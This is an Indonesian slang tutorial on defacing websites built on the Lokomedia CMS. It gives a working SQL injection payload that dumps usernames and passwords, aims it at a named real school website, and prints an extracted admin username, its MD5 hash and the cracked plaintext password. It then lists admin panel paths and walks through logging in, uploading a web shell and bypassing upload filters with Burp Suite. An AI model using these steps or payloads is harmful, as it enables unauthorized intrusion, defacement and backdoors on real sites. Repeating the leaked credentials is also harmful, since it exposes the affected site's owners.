w disini akan buat tutor cara depes metode SQL Lokomedia ,, oke ga usah kakean bacot langsung ae
Bahan Bahan :
1 . Dork : Sentuh Aku Mas
2 . SC Pepes : Touched
3 . Shell Backdoor : ewe.
4 . Purel
5 . Kimcil :v
1 . Dorking With search engine
2 . Pilih Salah 1 web yang ingin di eue
3 . Lalu Masukkan Exploit na Di target
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Contoh Web : http://www.coly.sch.id/statis-22-kerjasama.html ,,( exploit Di belakang Nomor )
Contoh : http://www.asedekentot:v.com/statis-22'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-kerjasama.html
Kalaw web na uda di exploit akan macam sperti ini
4 . Untuk Melihat User Dan password website kita tekan CTRL + U Biar lebih jelas
Dan Terlihat User : smarihast4 dan Pasword : c27e2f241869a7fde7092d7e91452441 , karena password masih dalam bentuk MD5 maka harus di decrypt , Dan untuk decrypt password md5 saya menggunakan hashkiller , Dan Kalian Bisa gunakan tools / aplikasi lain untung decrypt
Decrypt passowrd onlen : touch
Dan Skearang coba kita hash passoword na
Dan Hasilnya
Dan password : Veteran37
5 . Langkah Terakhir Kita Akan Mencari Admin login
Untuk Admin Login :
/adm
/adminweb
/administrator
/redaktur
Dan Kalian Bisa Scan admin login dengan admin finder onlen
Untuk Admin finder : sentuh
Dan Kalau Sudah Kita akan login Dengan User / password tad
user:admin
pw:Veteran37
Dan Kalau Sudah Login Kamu akan Di arah kan ke dashboard
Dan Taraa ,, Kamu Sudah berhasil masuk ke dashboard ...
Langkah terakhir kamu Cari tempat upload untuk Tempat upload shell kamu
Skarang upload shell kamu
Dan Shell berhasil di tanam Dan bisa di acses :v
Akses shell tinggal klik kanan pada gambar yang udah di up shell
* Untuk kendala Tidak bisa upload shell dengan extensi .php .phtml .php5 kita bisa tamper menggunakan burpsuite
Sekian tutor sql lokomedia iny smoga brmanfaat :v
byeeee..cok :V
